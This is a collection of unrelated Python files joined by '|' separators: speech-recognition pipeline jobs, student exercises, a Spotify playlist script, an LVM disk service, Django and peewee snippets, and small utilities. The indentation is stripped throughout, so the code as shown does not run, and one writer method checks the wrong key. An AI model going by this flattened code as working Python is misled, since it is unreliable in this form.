termoMais = int(input('Quantos termos você ainda quer mostrar mais?\n'))
quantTermo += termoMais
contadorTermosMais = 1
while contadorTermosMais < termoMais + 1:
an = termo + (c-1)*razao
print(an , '-> ' if contadorTermosMais < termoMais else '', end='')
c += 1
contadorTermosMais += 1
print('Progressão finalizada com {} termos'.format(quantTermo)) |
__all__ = ['RETURNNSearchFromFile', 'ReturnnScore', 'SearchBPEtoWords', 'SearchWordsToCTM']
from sisyphus import *
Path = setup_path(__package__)
import os
import stat
import subprocess as sp
from recipe.default_values import RETURNN_PYTHON_EXE, RETURNN_SRC_ROOT
class RETURNNSearchFromFile(Job):
def __init__(self, returnn_config_file, parameter_dict, output_mode="py",
time_rqmt=4, mem_rqmt=4,
returnn_python_exe=None, returnn_root=None):
self.returnn_python_exe = returnn_python_exe
self.returnn_root = returnn_root
self.returnn_config_file_in = returnn_config_file
self.parameter_dict = parameter_dict
if self.parameter_dict is None:
self.parameter_dict = {}
self.returnn_config_file = self.output_path('returnn.config')
self.rqmt = { 'gpu' : 1, 'cpu' : 2, 'mem' : mem_rqmt, 'time' : time_rqmt }
assert output_mode in ['py', 'txt']
self.out = self.output_path("search_out.%s" % output_mode)
self.parameter_dict['search_output_file'] = tk.uncached_path(self.out)
self.parameter_dict['search_output_file_format'] = output_mode
def update(self):
if "ext_model" in self.parameter_dict.keys() and "ext_load_epoch" in self.parameter_dict.keys():
epoch = self.parameter_dict['ext_load_epoch']
epoch = epoch.get() if isinstance(epoch, tk.Variable) else epoch
model_dir = self.parameter_dict['ext_model']
if isinstance(model_dir, tk.Path):
self.add_input(Path(str(model_dir) + "/epoch.%03d.index" % epoch, creator=model_dir.creator))
else:
self.add_input(Path(str(model_dir) + "/epoch.%03d.index" % epoch))
def tasks(self):
yield Task('create_files', mini_task=True)
yield Task('run', resume='run', rqmt=self.rqmt)
def get_parameter_list(self):
parameter_list = []
for k,v in sorted(self.parameter_dict.items()):
if isinstance(v, tk.Variable):
v = str(v.get())
elif isinstance(v, tk.Path):
v = tk.uncached_path(v)
else:
v = str(v)
if k == "ext_model" and not v.endswith("/epoch"):
v = v + "/epoch"
parameter_list.append("++%s" % k)
parameter_list.append(v)
return parameter_list
def create_files(self):
# returnn
self.sh("cp {returnn_config_file_in} {returnn_config_file}")
parameter_list = self.get_parameter_list()
with open('rnn.sh', 'wt') as f:
f.write('#!/usr/bin/env bash\n%s' % ' '.join([tk.uncached_path(self.returnn_python_exe), os.path.join(tk.uncached_path(self.returnn_root), 'rnn.py'), self.returnn_config_file.get_path()] + parameter_list))
os.chmod('rnn.sh', stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH | stat.S_IWUSR | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
def run(self):
parameter_list = self.get_parameter_list()
sp.check_call([tk.uncached_path(self.returnn_python_exe), os.path.join(tk.uncached_path(self.returnn_root), 'rnn.py'), self.returnn_config_file.get_path()] + parameter_list)
@classmethod
def hash(cls, kwargs):
d = { 'returnn_config_file' : kwargs['returnn_config_file'],
'parameter_dict' : kwargs['parameter_dict'],
'returnn_python_exe' : kwargs['returnn_python_exe'],
'returnn_root' : kwargs['returnn_root'],
'output_mode': kwargs['output_mode']}
return super().hash(d)
class GetBestEpoch(Job):
__sis_hash_exclude__ = {'key': None}
def __init__(self, model_dir, learning_rates, index=0, key=None):
self.model_dir = model_dir
self.learning_rates = learning_rates
self.index = index
self.out_var = self.output_var("epoch")
self.key = key
assert index >= 0 and isinstance(index, int)
def run(self):
def EpochData(learningRate, error):
return {'learning_rate': learningRate, 'error': error}
with open(self.learning_rates.get_path(), 'rt') as f:
text = f.read()
data = eval(text)
epochs = list(sorted(data.keys()))
if self.key == None:
dev_score_keys = [k for k in data[epochs[-1]]['error'] if k.startswith('dev_score')]
dsk = dev_score_keys[0]
else:
dsk = self.key
dev_scores = [(epoch, data[epoch]['error'][dsk]) for epoch in epochs if dsk in data[epoch]['error']]
sorted_scores = list(sorted(dev_scores, key=lambda x: x[1]))
print(sorted_scores)
self.out_var.set(sorted_scores[self.index][0])
def tasks(self):
yield Task('run', mini_task=True)
class SearchBPEtoWords(Job):
"""
Converts BPE Search output from returnn into words
:param search_output:
:param script:
"""
def __init__(self, search_output_bpe, script=Path("scripts/search-bpe-to-words.py")):
self.search_output_bpe = search_output_bpe
self.script = script
self.out = self.output_path("search_output.words")
def run(self):
self.sh("python3 {script} {search_output_bpe} --out {out}")
def tasks(self):
yield Task('run', mini_task=True)
class SearchWordsToCTM(Job):
"""
Converts search output (in words) from returnn into a ctm file
:param search_output:
:param script:
"""
__sis_hash_exclude__ = {"only_segment_name": False}
def __init__(self, search_output_words, corpus, only_segment_name=False, script=Path("scripts/search-words-to-ctm.py")):
self.search_output_words = search_output_words
self.corpus = corpus
self.script = script
self.only_segment_name = only_segment_name
self.out = self.output_path("search_output.ctm")
def run(self):
self.sh("python3 {script} {search_output_words} --corpus {corpus} %s --out {out}" % ("--only-segment-name" if self.only_segment_name else ""))
def tasks(self):
yield Task('run', mini_task=True)
class ReturnnScore(Job):
def __init__(self, hypothesis, reference, returnn_python_exe=RETURNN_PYTHON_EXE, returnn_root=RETURNN_SRC_ROOT):
self.set_attrs(locals())
self.out = self.output_path("wer")
def run(self):
call = [str(self.returnn_python_exe), os.path.join(str(self.returnn_root), 'tools/calculate-word-error-rate.py'),
"--expect_full",
"--hyps",
str(self.hypothesis), "--refs", str(self.reference), "--out", str(self.out)]
print("run %s" % " ".join(call))
sp.check_call(call)
def tasks(self):
yield Task('run', mini_task=True)
|
Python 3.8.5 (tags/v3.8.5:580fbb0, Jul 20 2020, 15:43:08) [MSC v.1926 32 bit (Intel)] on win32
Type "help", "copyright", "credits" or "license()" for more information.
>>> #I pledge my honor that I have abided by the Stevens Honor system -Kyriacos Petrou
>>> #write a program that computes the sum of a list of numbers
>>> def main():
lst = []
num = int(input('How many numbers: '))
for n in range(num):
numbers = int(input('Enter number '))
lst.append(numbers)
print("Sum of elements in given lists is :", sum(lst))
>>> main()
How many numbers: 5
Enter number 1
Enter number 2
Enter number 3
Enter number 4
Enter number 5
Sum of elements in given lists is : 15
>>> |
# set practice
math = ["张三", "田七", "李四", "马六"]
english = ["李四", "王五", "田七", "陈八"]
art = ["陈八", "张三", "田七", "赵九"]
music = ["李四", "田七", "马六", "赵九"]
# 1. 求同时选修了math和music的人
print(set(math).intersection(set(music)))
# 2. 求同时选修了math,enlish和music的人
print(set(math).intersection(set(english)).intersection(set(music)))
# 3. 求同时选修了4种课程的人
print(set(math).intersection(set(english)).intersection(set(art)).intersection(set(music))) |
# Modifications © 2020 Hashmap, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
from sys import platform
from providah.factories.package_factory import PackageFactory as pf
import pandas as pd
import yaml
# pylint: disable=too-many-arguments
# pylint: disable=too-many-locals
@pd.api.extensions.register_dataframe_accessor('dataframez')
class CatalogWriter:
"""Extends pandas DataFrame to write to a cataloged persistent storage."""
__logger = logging.getLogger()
if platform.lower() != 'windows':
__configuration_path: str = os.path.join(os.getenv("HOME"), '.dataframez/configuration.yml')
else:
__configuration_path: str = os.path.join(os.getenv("USERPROFILE"), '.dataframez/configuration.yml')
__writers: dict = {}
def __init__(self, df: pd.DataFrame):
self._df = df
self.__configure_writer_methods()
self.__configure_catalog()
def __configure_catalog(self) -> None:
"""Constructor method that calls factory to create catalog instance."""
# When a configuration already exists, load it
with open(self.__configuration_path, 'r') as stream:
registry_configuration = yaml.safe_load(stream)['configurations']['catalog']
# Load the configuration
self.__catalog = pf.create(key=registry_configuration['type'],
configuration=registry_configuration['conf'])
def __configure_writer_methods(self):
"""Constructor method to populate allowed writer methods"""
# ----------- create local registry of all writers ---------- #
# Load configuration
with open(self.__configuration_path, 'r') as config_stream:
configuration = yaml.safe_load(stream=config_stream)['configurations']
for key, value in configuration['writers'].items():
if value['conf']['allowed']:
self.__writers[key.lower()] = pf.create(key=value['type'].lower(),
library='dataframez',
configuration=value['conf']).write
def to_csv(self,
register_as: str,
sep=',',
na_rep='',
float_format=None,
columns=None,
header=True,
index=True,
index_label=None,
mode='w',
encoding=None,
compression='infer',
quoting=None,
quotechar='"',
line_terminator=None,
chunksize=None,
date_format=None,
doublequote=True,
escapechar=None,
decimal='.',
errors='strict') -> None:
"""
Write CSV to persistence layer dictated by configuration and asset name.
Args:
register_as: Name of asset in catalog.
sep:
na_rep:
float_format:
columns:
header:
index:
index_label:
mode:
encoding:
compression:
quoting:
quotechar:
line_terminator:
chunksize:
date_format:
doublequote:
escapechar:
decimal:
errors:
Returns:
"""
if 'csv' not in self.__writers.keys():
raise PermissionError('to_csv not supported with the current configuration. Please check your configuration or speak to your system administrator '
'if you believe that this is may be in error.')
self.__writers['csv'](_df=self._df, entry_name=register_as, **{'sep': sep,
'na_rep': na_rep,
'float_format': float_format,
'columns': columns,
'header': header,
'index': index,
'index_label': index_label,
'mode': mode,
'encoding': encoding,
'compression': compression,
'quoting': quoting,
'quotechar': quotechar,
'line_terminator': line_terminator,
'chunksize': chunksize,
'date_format': date_format,
'doublequote': doublequote,
'escapechar': escapechar,
'decimal': decimal,
'errors': errors})
def to_pickle(self, register_as: str, compression: str = 'infer', protocol: int = -1) -> None:
"""
Write Pickle to persistence layer dictated by configuration and asset name.
Args:
register_as: Name of asset in catalog.
compression:
protocol:
"""
if 'parquet' not in self.__writers.keys():
raise PermissionError('to_parquet not supported with the current configuration. Please check your configuration or speak to your system '
'administrator if you believe that this is may be in error.')
self.__writers['pickle'](_df=self._df, entry_name=register_as, **{'compression': compression,
'protocol': protocol})
def to_parquet(self, register_as: str, engine='auto', compression='snappy', index=None, **kwargs):
"""
Write Parquet to persistence layer dictated by configuration and asset name.
Args:
register_as: Name of asset in catalog.
engine:
compression:
index:
**kwargs:
Returns:
"""
if 'parquet' not in self.__writers.keys():
raise PermissionError('to_parquet not supported with the current configuration. Please check your configuration or speak to your system '
'administrator if you believe that this is may be in error.')
self.__writers['parquet'](_df=self._df, entry_name=register_as, **{'compression': compression,
'engine': engine,
'index': index,
**kwargs})
|
import os
import shutil
from wmt.config import site
from wmt.models.submissions import prepend_to_path
from wmt.utils.hook import find_simulation_input_file
from topoflow_utils.hook import choices_map
file_list = ['rti_file',
'DEM_file',
'H0_file',
'pixel_file']
def execute(env):
"""Perform pre-stage tasks for running a component.
Parameters
----------
env : dict
A dict of component parameter values from WMT.
"""
env['n_steps'] = int(round(float(env['run_duration']) / float(env['dt'])))
env['save_grid_dt'] = float(env['dt'])
env['save_pixels_dt'] = float(env['dt'])
# TopoFlow needs site_prefix and case_prefix.
env['site_prefix'] = os.path.splitext(env['rti_file'])[0]
env['case_prefix'] = 'WMT'
# If no pixel_file is given, let TopoFlow make one.
if env['pixel_file'] == 'off':
file_list.remove('pixel_file')
env['pixel_file'] = env['case_prefix'] + '_outlets.txt'
if env['H0_file'] == 'off':
file_list.remove('H0_file')
env['H0_file'] = 'None'
env['VARIABLE_DT_TOGGLE'] = choices_map[env['VARIABLE_DT_TOGGLE']]
env['INIT_COND_TOGGLE'] = choices_map[env['INIT_COND_TOGGLE']]
env['GENERIC_ICE_TOGGLE'] = choices_map[env['GENERIC_ICE_TOGGLE']]
env['ICEFLOW_TOGGLE'] = choices_map[env['ICEFLOW_TOGGLE']]
env['ICESLIDE_TOGGLE'] = choices_map[env['ICESLIDE_TOGGLE']]
env['FREEZE_ON_TOGGLE'] = choices_map[env['FREEZE_ON_TOGGLE']]
# Default files common to all TopoFlow components are stored with the
# topoflow component metadata.
prepend_to_path('WMT_INPUT_FILE_PATH',
os.path.join(site['db'], 'components', 'topoflow', 'files'))
for fname in file_list:
src = find_simulation_input_file(env[fname])
shutil.copy(src, os.curdir)
|
import heapq
class Solution:
# @param A : integer
# @param B : list of integers
# @return an integer
def nchoc(self, A, B):
"""
Python's heapq data structure is a minheap, so I had to put the values in as value * -1,
and then just convert back and forth when popping/pushing from/to the heap.
"""
heap = [-num for num in B]
heapq.heapify(heap)
total = 0
for time in range(A):
if not heap:
# if all the chocolates are already gone, or were never there, no more time needed
break
candies = -heapq.heappop(heap)
total += candies
heapq.heappush(heap, -(candies / 2))
return total % 1000000007
|
from _collections import defaultdict
def total_price_fn(price_product, quantity_product):
total_price = price_product * quantity_product
return total_price
products = defaultdict(list)
while True:
command = input()
if command == "buy":
break
name, price, quantity = command.split()
if name not in products.keys():
products[name].append(float(price))
products[name].append(int(quantity))
else:
products[name][0] = float(price)
products[name][1] += int(quantity)
for product, price_quantity in products.items():
# total_price_fn = lambda price, quantity: price * quantity
# total_price = total_price_fn(price_quantity[0], price_quantity[1])
print(f"{product} -> {total_price_fn(price_quantity[0], price_quantity[1]):.2f}")
|
# -*- coding: utf-8 -*-
import spotipy
import sys
import datetime
import keys as keys
from spotipy.oauth2 import SpotifyClientCredentials
client_credentials_manager = SpotifyClientCredentials(client_id=keys.client_id,
client_secret=keys.client_secret)
spotify = spotipy.Spotify(
client_credentials_manager=client_credentials_manager)
username = keys.spot_username # your username (not an email address)
createnewplaylist = True # Set this to true to create a new playlist with the name below; set this to false to use an already created playlist, and follow instructions below
newplaylistname = 'Top'
date = str(datetime.datetime.today().strftime('%m-%d-%y'))
description = 'Automatically generated ' + date + 'beep boop'
# If using an already existing playlist, go to Spotify and right click on a playlist and select "Copy Spotify URI". Paste the value below, keeping only the numbers at the end of the URI
oldplaylistID = '3uEcg6o2uf2ijoyeRj3zLiF'
dataFile = "output.txt"
delim = ' - ' # charecters between song title and artist in your data file; make sure this is not something that could be present in the song title or artist name
my_client_id = keys.client_id
my_client_secret = keys.client_secret
######
######
import sys
import spotipy
import spotipy.util as util
import requests
scope = 'user-library-read playlist-modify-public playlist-modify-private'
data = open(dataFile).readlines()
#period = open(dataFile).readline().rstrip()
#print(period)
token = util.prompt_for_user_token(username, scope, client_id=my_client_id,
client_secret=my_client_secret, redirect_uri='http://localhost:8888/callback')
myAuth = "Bearer " + token
notfound = []
b = 0
if token:
sp = spotipy.Spotify(auth=token)
if createnewplaylist:
r = sp.user_playlist_create(username, newplaylistname, False, description)
playlistID = r['id']
sp.user_playlist_change_details(username, playlistID, newplaylistname, False, False, description)
#sp.user_playlist_change_details(username, playlistID, newplaylistname, description)
#sp.user_playlist_change_details(username, playlistID, name=newplaylistname, public=None, collaborative=None, description=description)
else:
playlistID = oldplaylistID
for line in data:
l = line.split(delim)
# If you have any characters after your track title before your delimiter, add [:-1] (where 1 is equal to the number of additional characters)
trackTitle = l[0]
# [:-1] removes the newline at the end of every line. Make this [:-2] if you also have a space at the end of each line
artist = l[1][:-1]
#art = artist.replace('e','e')
#trk = trackTitle.replace('®','')
art = artist
trk = trackTitle
q = '{} {}'.format(art, trk)
r = sp.search(q=q)
a=0
for track in r['tracks']['items']:
a+=1
b+=1
artists =[r['tracks']['items'][0]['name']]
track_id = [r['tracks']['items'][0]['uri']]
sp.user_playlist_add_tracks(username, playlistID, track_id)
output = str("Added " + trk + " by " + art)
print(output)
if a == 1:
break
if b == 30:
print("Added 30 songs")
else:
print("Missing " + str(30-b) + " song(s)")
else:
print("exit")
|
from django.urls import path
from .views import comment_create_view
urlpatterns = [
path('comment/<uuid:post_id>/', comment_create_view, name='new_comments'),
] |
#!/usr/bin/env python3
import argparse, pprint, statistics
from collections import defaultdict
import rend
import HPLResult
# For minMaxAvgPerBin
MMAMin = 0
MMAMax = 1
MMAAvg = 2
def binResultsBy(results, binningFunction):
"""
Place results into bins depending on a binning function.
:param results: A list of results to bin.
:param binningFunction: The function to use to sort results into bins. You can use the getters in HPLResult for this.
For example, to bin functions by NB, one should use HPLResult.getNB for the binningFunction.
:return: A dictionary containing a list of results mapped to key values by the result of the binning function.
"""
binnedResults = defaultdict(list) # if an invalid key is accessed, it defaults to being an empty list
for result in results:
binnedResults[binningFunction(result)].append(result) # using dict.get() here breaks the defaultdict behaviour
return dict(binnedResults) # cast to dict - we don't need the default entry functionality anymore
def minMaxAvgPerBin(binnedResults, statFunction):
"""
For each bin in the binned results, find the minimum, maximum, and average of the value of the results determined
by statFunction. The constants MMAMin, MMAMax, and MMAAvg are meant for accessing the results tuple data.
:param binnedResults: The binned HPLResults.
:param statFunction: A function that will return a value given an HPLResult. This will most likely be a getter from
HPLResult.
:return: A dictionary containing a tuple with the min, max, and average value of the bin as given by statFunction.
"""
results = {}
for key, contents in binnedResults.items(): # Loop over all of the bins.
contents = list(map(statFunction, contents)) # Process their contents with statFunction.
results[key] = (min(contents), max(contents), statistics.mean(contents)) # Minimum, maximum, average
return results
def getBestBin(binnedResults, statFunction, lowerIsBetter):
"""
Gets the best bin based on the average return value of statFunction for the items in that bin.
:param binnedResults: The binned HPLResults.
:param statFunction: A function that will return a value based on an HPLResult. See also minMaxAvgPerBin.
:param lowerIsBetter: Is a lower score preferable?
:return: The key value for the best bin on average for the given statFunction.
"""
minMaxAvg = minMaxAvgPerBin(binnedResults, statFunction)
bins = list(minMaxAvg.keys())
# Sort the bins based on their average values, where the 0th element is the best.
bins.sort(key = lambda x: minMaxAvg.get(x)[MMAAvg], reverse = not lowerIsBetter)
return bins[0] # return the 0th element, which is the best
if __name__ == "__main__":
# Set up argument values
parser = argparse.ArgumentParser()
parser.add_argument("input", help = "HPL output file to analyze")
parser.add_argument("-s", "--statistic", help = "The result property used for finding the best bin on average (required)", choices = HPLResult.GetterCommandLineNames, required = True)
parser.add_argument("-b", "--bin", help = "The result property used for binning the output (default: null binning function)", choices = HPLResult.NameToGetter.keys())
parser.add_argument("-o", "--output", help = "Where to output the results, defaults to stdout")
parser.add_argument("-v", "--verbose", action = "store_true", help = "When used, outputs the results sorted into bins")
parser.add_argument("-t", "--title", help = "Title for this run")
args = parser.parse_args()
# Get some necessary data based off the arguments
binFunc = HPLResult.NameToGetter.get(args.bin)
statFunc = HPLResult.NameToGetter.get(args.statistic)
binName = HPLResult.NameToDisplayName.get(args.bin)
statName = HPLResult.NameToDisplayName.get(args.statistic)
# Process data
binnedResults = binResultsBy(rend.rendData(args.input), binFunc)
minMaxAvg = minMaxAvgPerBin(binnedResults, statFunc)
bestBin = getBestBin(binnedResults, statFunc, statFunc == HPLResult.HPLResult.getTime)
# Write output
outFile = None
if args.output: # We have an output file, write to it
outFile = open(args.output, 'w')
write = lambda x: outFile.write(str(x) + "\n")
else: # No output file, write to stdout
write = lambda x: print(x)
if args.title:
write("Results for {}".format(args.title))
else:
write("Results for {}".format(args.input))
if args.verbose:
write("Arguments to HPLResult are defined as follows:")
write("Encoded time, N, NB, P, Q, Time, Gigaflops, Start time, End time")
write("")
write("Results are binned by {}".format(binName))
write("")
if args.verbose:
write("Binned results")
write(pprint.pformat(binnedResults))
write("")
write("Minimum, maximum, and average {} per bin".format(statName))
write(pprint.pformat(minMaxAvg))
write("")
write("Best bin with respect to {}".format(statName))
write(bestBin)
# Clean up the output file if we opened it
if outFile:
outFile.close()
del outFile
|
from torch.utils.data import Dataset
from pathlib import Path
from collections import namedtuple
from PIL import Image
import torch
from torchvision import transforms as T
# from utils import AUG
import numpy as np
Pair = namedtuple('Pair', ['image', 'mask'])
class BaseDataSet(Dataset):
def __init__(self, root):
"""
Initilize parameters
root (Path): base root for original data and labeled data.
augment (Bool): wheter does augmentation or not.
"""
self.root = Path(root)
self.files = []
self._correspond()
def _correspond(self):
'''
1.Set original data root and labeled data root.
2.Fill self.files with namedtuples each composed by the root of train original data and labeled data.
file_path = namedtuple('file_path', ['original_path', 'labeled_path'])
Tips: Must be called before _load_data
'''
raise NotImplementedError
def _load_data(self, index):
'''
Cooperate with __getitem__,This method should be implemented based on the dataset's specilities.
Aim: Return a pair contains a piece of original data and labeled data which readed from the file path.
pair = namedtuple('pair', ['original', 'labeled'])
'''
raise NotImplementedError
def __len__(self):
return len(self.files)
def __getitem__(self, index):
'''
Return a named tuple. pair = (origin = xx, label = xx)
First: Fetch a pair of original data and labeled data.
Second: Augment the pair of data in 'train' or 'val' way.
'''
if index >= self.__len__() or index < 0:
raise IndexError
else:
pair = self._load_data(index)
return pair |
"""LVM based local disk management service.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import math
import os
import six
from treadmill import cgroups
from treadmill import cgutils
from treadmill import localdiskutils
from treadmill import logcontext as lc
from treadmill import lvm
from treadmill import subproc
from treadmill import utils
from . import BaseResourceServiceImpl
_LOGGER = logging.getLogger(__name__)
TREADMILL_LV_PREFIX = 'tm-'
def _uniqueid(app_unique_name):
"""Create unique volume name based on unique app name.
"""
_, uniqueid = app_unique_name.rsplit('-', 1)
return TREADMILL_LV_PREFIX + uniqueid
class LocalDiskResourceService(BaseResourceServiceImpl):
"""LocalDisk service implementation.
"""
__slots__ = (
'_block_dev',
'_read_bps',
'_write_bps',
'_read_iops',
'_write_iops',
'_default_read_bps',
'_default_read_iops',
'_default_write_bps',
'_default_write_iops',
'_pending',
'_vg_name',
'_vg_status',
'_volumes',
'_extent_reserved',
)
PAYLOAD_SCHEMA = (
('size', True, str),
)
def __init__(self, block_dev, vg_name,
read_bps, write_bps, read_iops, write_iops,
default_read_bps='20M', default_write_bps='20M',
default_read_iops=100, default_write_iops=100):
super(LocalDiskResourceService, self).__init__()
self._block_dev = block_dev
self._read_bps = read_bps
self._write_bps = write_bps
self._read_iops = read_iops
self._write_iops = write_iops
self._vg_name = vg_name
self._vg_status = {}
self._volumes = {}
self._extent_reserved = 0
self._pending = []
# TODO: temp solution - throttle read/writes to
# 20M/s. In the future, IO will become part
# of app manifest spec and managed by
# scheduler same way as other resources.
# TODO: Added IOps limit as well.
self._default_read_bps = default_read_bps
self._default_write_bps = default_write_bps
self._default_read_iops = default_read_iops
self._default_write_iops = default_write_iops
def initialize(self, service_dir):
super(LocalDiskResourceService, self).initialize(service_dir)
# Make sure LVM Volume Group set up
localdiskutils.setup_device_lvm(self._block_dev, self._vg_name)
# Finally retrieve the LV info
lvs_info = lvm.lvsdisplay(group=self._vg_name)
# Mark all retrived volumes that were created by treadmill as 'stale'
for lv in lvs_info:
lv['stale'] = lv['name'].startswith(TREADMILL_LV_PREFIX)
if lv['open_count']:
_LOGGER.warning('Logical volume in use: %r', lv['block_dev'])
# Count the number of extents taken by non-treadmill volumes
self._extent_reserved = sum([
lv['extent_size'] for lv in lvs_info if not lv['stale']
])
volumes = {
lv['name']: {
k: lv[k]
for k in [
'name', 'block_dev',
'dev_major', 'dev_minor',
'extent_size',
'stale',
]
}
for lv in lvs_info
}
self._volumes = volumes
self._vg_status = localdiskutils.refresh_vg_status(self._vg_name)
def synchronize(self):
"""Make sure that all stale volumes are removed.
"""
modified = False
for uniqueid in six.viewkeys(self._volumes.copy()):
if self._volumes[uniqueid].pop('stale', False):
modified = True
# This is a stale volume, destroy it.
self._destroy_volume(uniqueid)
if not modified:
return
# Now that we successfully removed a volume, retry all the pending
# resources.
for pending_id in self._pending:
self.retry_request(pending_id)
self._pending = []
# We just destroyed a volume, refresh cached status from LVM and notify
# the service of the availability of the new status.
self._vg_status = localdiskutils.refresh_vg_status(self._vg_name)
def report_status(self):
status = self._vg_status.copy()
extent_avail = status['extent_nb'] - self._extent_reserved
status['size'] = extent_avail * status['extent_size']
status.update({
'read_bps': self._read_bps,
'write_bps': self._write_bps,
'read_iops': self._read_iops,
'write_iops': self._write_iops
})
return status
def on_create_request(self, rsrc_id, rsrc_data):
app_unique_name = rsrc_id
size = rsrc_data['size']
read_bps = self._default_read_bps
write_bps = self._default_write_bps
read_iops = self._default_read_iops
write_iops = self._default_write_iops
with lc.LogContext(_LOGGER, rsrc_id,
adapter_cls=lc.ContainerAdapter) as log:
log.info('Processing request')
size_in_bytes = utils.size_to_bytes(size)
uniqueid = _uniqueid(app_unique_name)
# Create the logical volume
existing_volume = uniqueid in self._volumes
if not existing_volume:
needed = math.ceil(
size_in_bytes / self._vg_status['extent_size']
)
if needed > self._vg_status['extent_free']:
# If we do not have enough space, delay the creation until
# another volume is deleted.
log.info(
'Delaying request %r until %d extents are free.'
' Current volumes: %r',
rsrc_id, needed, self._volumes)
self._pending.append(rsrc_id)
return None
lvm.lvcreate(
volume=uniqueid,
group=self._vg_name,
size_in_bytes=size_in_bytes,
)
# We just created a volume, refresh cached status from LVM
self._vg_status = localdiskutils.refresh_vg_status(
self._vg_name
)
lv_info = lvm.lvdisplay(
volume=uniqueid,
group=self._vg_name
)
# Configure block device using cgroups (this is idempotent)
# FIXME(boysson): The unique id <-> cgroup relation should be
# captured in the cgroup module.
cgrp = os.path.join('treadmill', 'apps', app_unique_name)
cgutils.create('blkio', cgrp)
major, minor = lv_info['dev_major'], lv_info['dev_minor']
cgroups.set_value(
'blkio', cgrp,
'blkio.throttle.write_bps_device',
'{major}:{minor} {bps}'.format(
major=major,
minor=minor,
bps=utils.size_to_bytes(write_bps),
)
)
cgroups.set_value(
'blkio', cgrp,
'blkio.throttle.read_bps_device',
'{major}:{minor} {bps}'.format(
major=major,
minor=minor,
bps=utils.size_to_bytes(read_bps),
)
)
cgroups.set_value(
'blkio', cgrp,
'blkio.throttle.write_iops_device',
'{major}:{minor} {iops}'.format(
major=major,
minor=minor,
iops=write_iops
)
)
cgroups.set_value(
'blkio', cgrp,
'blkio.throttle.read_iops_device',
'{major}:{minor} {iops}'.format(
major=major,
minor=minor,
iops=read_iops
)
)
volume_data = {
k: lv_info[k]
for k in ['name', 'block_dev',
'dev_major', 'dev_minor', 'extent_size']
}
# Record existence of the volume.
self._volumes[lv_info['name']] = volume_data
return volume_data
def on_delete_request(self, rsrc_id):
app_unique_name = rsrc_id
with lc.LogContext(_LOGGER, rsrc_id):
uniqueid = _uniqueid(app_unique_name)
# Remove it from state (if present)
if not self._destroy_volume(uniqueid):
return
# Now that we successfully removed a volume, retry all the pending
# resources.
for pending_id in self._pending:
self.retry_request(pending_id)
self._pending = []
# We just destroyed a volume, refresh cached status from LVM and
# notify the service of the availability of the new status.
self._vg_status = localdiskutils.refresh_vg_status(self._vg_name)
return True
def _destroy_volume(self, uniqueid):
"""Try destroy a volume from LVM.
"""
# Remove it from state (if present)
self._volumes.pop(uniqueid, None)
try:
lvm.lvdisplay(uniqueid, group=self._vg_name)
except subproc.CalledProcessError:
_LOGGER.warning('Ignoring unknow volume %r', uniqueid)
return False
# This should not fail.
lvm.lvremove(uniqueid, group=self._vg_name)
_LOGGER.info('Destroyed volume %r', uniqueid)
return True
|
#!/usr/bin/env python
# ex: set shiftwidth=4 tabstop=4 expandtab:
import subprocess
def get_temp():
""" Function to get the Raspberry Pi's CPU temperature """
cmd = '/opt/vc/bin/vcgencmd measure_temp'
try:
output = run_cmd(cmd)
cel = output.split("'")[0]
flt_cel = float(cel)
temp = ((flt_cel * 9) / 5) + 32
except:
temp = 'Could not determine CPU temperature'
return temp
def run_cmd(cmd):
return subprocess.check_output(cmd.split()).strip().split('=')[1]
def main():
print(get_temp())
if __name__ == '__main__':
main()
|
import unittest
from katas.kyu_6.custom_array_filters import MyList
class MyListTestCase(unittest.TestCase):
def test_equal_1(self):
self.assertEqual(MyList([1, 2, 3, 4, 5]).even(), [2, 4])
def test_equal_2(self):
self.assertEqual(MyList([1, 2, 3, 4, 5]).odd(), [1, 3, 5])
def test_equal_3(self):
self.assertEqual(MyList([1, 2, 3, 4, 5]).under(4), [1, 2, 3])
def test_equal_4(self):
self.assertEqual(MyList([1, 2, 3, 4, 5]).over(4), [5])
def test_equal_5(self):
self.assertEqual(MyList([1, 2, 3, 4, 5]).in_range(1, 3), [1, 2, 3])
def test_equal_6(self):
self.assertEqual(MyList(
MyList([1, 2, 3, 4, 5, 6, 7, 8, 9, 10]).even()
).under(5), [2, 4])
def test_equal_7(self):
self.assertEqual(MyList(
['a', 1, 'b', 300, 'x', 'q', 63, 122, 181, 'z', 0.83, 0.11]
).even(), [300, 122])
|
import peewee
import peewee_async
from app.settings import DATABASE
database = peewee_async.PostgresqlDatabase(
database=DATABASE.get("NAME"),
user=DATABASE.get("USER"),
password=DATABASE.get("PASSWORD"),
host=DATABASE.get("HOST"),
port=DATABASE.get("PORT"),
)
class Page(peewee.Model):
id = peewee.PrimaryKeyField()
name = peewee.CharField(max_length=255)
slug = peewee.CharField(max_length=255)
class Meta:
database = database
order_by = ['name']
class Block(peewee.Model):
id = peewee.PrimaryKeyField()
name = peewee.CharField(max_length=255)
url = peewee.CharField(max_length=255)
page = peewee.ForeignKeyField(Page, backref='blocks')
views = peewee.IntegerField(default=0, null=True)
class Meta:
database = database
order_by = ['page']
|
import json
from pathlib import Path
import typer
import pandas as pd
METRICS = ("MCRMSE", "best_validation_loss")
def main(log_dir: str, metrics_name: str = "kaggle_metrics.json"):
metrics = []
for path in Path(log_dir).iterdir():
with open(str(path / metrics_name)) as f:
curr_metrics = json.load(f)
curr_metrics["fold"] = path.name
metrics.append(curr_metrics)
metrics = pd.DataFrame(metrics)
for metric_name in METRICS:
if metric_name in metrics.columns:
for idx, row in metrics.iterrows():
value = row[metric_name]
typer.secho(f"({row.fold}) {metric_name} = {value:.3f}", fg="red")
mean_value = metrics[metric_name].mean()
typer.secho(f"{metric_name} = {mean_value:.3f}", fg="green")
if __name__ == "__main__":
typer.run(main)
|
from django import forms
from .models import DOUGH_CHOICES, Pizza
class PizzaForm(forms.ModelForm):
dough = forms.ChoiceField(label='Тесто', choices=DOUGH_CHOICES, widget=forms.RadioSelect, initial='0')
class Meta:
model = Pizza
fields = ('dough',)
|
